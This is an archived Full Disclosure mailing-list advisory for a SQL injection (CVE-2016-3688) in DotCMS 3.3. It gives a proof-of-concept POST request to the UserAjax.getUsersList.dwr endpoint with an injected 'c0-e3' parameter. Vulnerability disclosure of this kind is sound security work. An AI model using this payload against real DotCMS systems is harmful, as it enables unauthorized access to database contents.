[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] DotCMS injection Vulnerability
From:       "=?gb18030?B?cDB4MjAxNQ==?=" <573031544 () qq ! com>
Date:       2016-03-31 13:13:15
Message-ID: tencent_5C7FBBAC00F6CF254FA01FBD () qq ! com
[Download RAW message or body]

[Attachment #2 (multipart/related)]

[Attachment #4 (text/plain)]

Hello,please Add the following  to the security mailing-lists.

1¡¢Description
 
Exploit Title: SQL Injection Vulnerability in DotCms v3.3
 
Date: 3-28-2016
 
Vendor Homepage: http://dotcms.com/
 
Vendor: dotcms
 
Software: Content Management System
 
Version: v3.3

CVE:CVE-2016-3688


 
  
 
2¡¢Product Summary
 
================
 
dotcms is a fully featured open source enterprise grade J2EE/Java based web content management \
system for building/managing websites, content and content driven web applications. it¡¯s \
specially designed for bridges the gap between PHP CMS and J2EE document management solutions. \
it include features such as support for virtual hosting, WebDav (beta), structured content, \
clustering and can run on multiple databases PostgreSQL, MySQL, MSSQL and Oracle. It also \
includes standard WCMS features like page caching, templating, and a API.  
 
 
3¡¢Vulnerabilities
 
================
 
A SQL injection vulnerability has been identified in dotCMS 3.3 which, if successfully \
exploited, could allow an attacker to access sensitive information in the dotcms database.   
Demo:(http://dotcms.com/content-management-system/cms-demo)
 
 
 
The vulnerability is due to the dwr/call/plaincall/UserAjax.getUsersList.dwr \
,¡°c0-e3¡±parameter  
 
 
Proof of concept
 
================
 
POST /dwr/call/plaincall/UserAjax.getUsersList.dwr 
 
 callCount=1
 
windowName=c0-param2
 
c0-scriptName=UserAjax
 
c0-methodName=getUsersList
 
c0-id=0
 
c0-param0=null:null
 
c0-param1=null:null
 
c0-e1=number:0
 
c0-e2=number:50
 
c0-e3=string:%25'%20and%201%3D1%20and%20'%25'%3D'
 
c0-param2=Object_Object:{start:reference:c0-e1, limit:reference:c0-e2, query:reference:c0-e3}
 
batchId=4
 
instanceId=0
 
page=%2Fc%2Fportal%2Flayout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3DEXT_USER_ADMIN%26p_p_action%3D0%26%26dm_rlout%3D1%26r%3D1459154302419
  
scriptSessionId=jnMOli*Civ5bu2PIg2Z1YaOlYel/10irYel-hmv1Q$Yud
 


 
 
 
4¡¢Discovered by
 
================
 piaox xiong ¨C xiongyaofu351@pingan.com.cn


["3001F400@35235C51.6B22FD56" (application/octet-stream)]

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic